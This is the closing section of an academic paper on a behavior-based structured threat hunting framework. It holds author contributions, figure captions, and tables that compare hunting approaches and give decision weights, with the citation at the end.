Conceptualization, A.B., K.K. and S.B.; methodology, A.B., K.K., S.B., A.A. (Abdullah Alomari) and A.A. (Amjad Alsirhani); software, A.B., K.K. and S.B.; validation, A.B., K.K. and S.B.; formal analysis, A.A. (Abdullah Alomari), S.B. and M.M.A.; investigation A.B., K.K. and S.B.; resources, A.A. (Abdullah Alomari); data curation, S.B.; writing—original draft preparation, A.B., K.K., S.B. and A.A. (Amjad Alsirhani); writing—review and editing, A.B., K.K., A.A. (Abdullah Alomari) and S.B.; visualization, S.B. and M.M.A.; supervision, A.B. and S.B.; project administration, S.B. and A.A. (Abdullah Alomari); funding acquisition, A.A. (Abdullah Alomari) and M.M.A. All authors have read and agreed to the published version of the manuscript.

Funding

This research received no external funding.

Conflicts of Interest

The authors declare that they have no conflicts of interest to report regarding the present study.

Figure 1. An example of threat Intelligence Report summary.
Figure 2. Threat intelligence report IoCs.
Figure 3. Elastic instance displaying threat logs.
Figure 4. Threat hunt search.
Figure 5. (a) Elastic Endpoint Sysmon. (b) Elastic Endpoint Sysmon script.
Figure 6. Script reported threat activities.
Figure 7. Script search results.
Figure 8. Filtering for process variables.
Figure 9. Payload analysis.
Figure 10. Report on VB script.
Figure 11. Delayed execution search and overview.
Figure 12. Search results for Ping and Loopback threat vectors.
Figure 13. Filtering results.
Figure 14. Process ID filtering results.
Figure 15. Process ID filtering results (logs).
Figure 16. Threat hunting workflow.
Figure 17. Email log review.
Figure 18. Privilege escalation identified.
Figure 19. Hunt artifacts uncovered.
Table 1. Structured vs. unstructured threat hunting.
Structured Threat Hunting:
  • Usually driven by a central hypothesis for a specific TTP and entity driven for detecting threats.
  • Conducted on a regular and routine basis to provide ongoing assurance and protection while generating predictable results.
  • This can help identify adversarial tactics, techniques, and procedures (TTPs).
  • Leads to the development of robust behavioral threat detection content creation.
Unstructured Threat Hunting:
  • Mostly data-driven, leveraging the principle of least seen to identify anomalies in an environment.
  • Frequently conducted on an ad hoc schedule, when time/resources permit, this can lead to rabbit-hole hunts and unpredictable results.
  • This helps detect and identify malware, malicious tools, network, and host-based artifacts.
  • Provides new IoCs for threat feeds and basic signature creation.
Table 2. Behavior-based threat hunting literature categorization.
Review Performed          | Stage-1 | Stage-2 | Stage-3 | Stage-4 | Overall %
Indicators of Compromise  | 67      | 50      | 30      | 6       | 27.57%
Threat Hunting            | 47      | 35      | 21      | 4       | 19.34%
Threat Intelligence       | 41      | 31      | 18      | 4       | 16.87%
Unstructured Threat Hunt  | 34      | 26      | 15      | 3       | 13.99%
Structured Threat Hunt    | 54      | 41      | 24      | 5       | 22.22%
Total                     | 243     | 182     | 109     | 22      |
Table 3. Decision making parameters.
Hunt Criteria            | Range   | Weight
C-1: Risk category       | 0 to 3  | 0.41
C-2: Malware             | 1 to 12 | 0.14
C-3: Impact potential    | 1 to 15 | 0.1
C-4: Attack probability  | 0 to 1  | 0.18
C-5: Breach complexity   | 1 to 99 | 0.35
Table 4. Sigma and binary output.
ID | Type        | Log 1
1  | Malware     | 1
2  | Intrusion   | 1
3  | Phishing    | 1
4  | Brute Force | 0
5  | DDoS        | 0
Table 5. Profiling enterprise threat hunting levels.
Profile                                                                                   | Percentage
Create hypothesis to drive threat hunting efforts                                         | 55%
Use threat intelligence to hypothesize where threats may be found or attacks are executing | 76%
Perform behavior-based hunts, using measurable improvement in overall security posture    | 91%
Bhardwaj, A.; Kaushik, K.; Alomari, A.; Alsirhani, A.; Alshahrani, M.M.; Bharany, S. BTH: Behavior-Based Structured Threat Hunting Framework to Analyze and Detect Advanced Adversaries. Electronics 2022, 11, 2992. https://doi.org/10.3390/electronics11192992
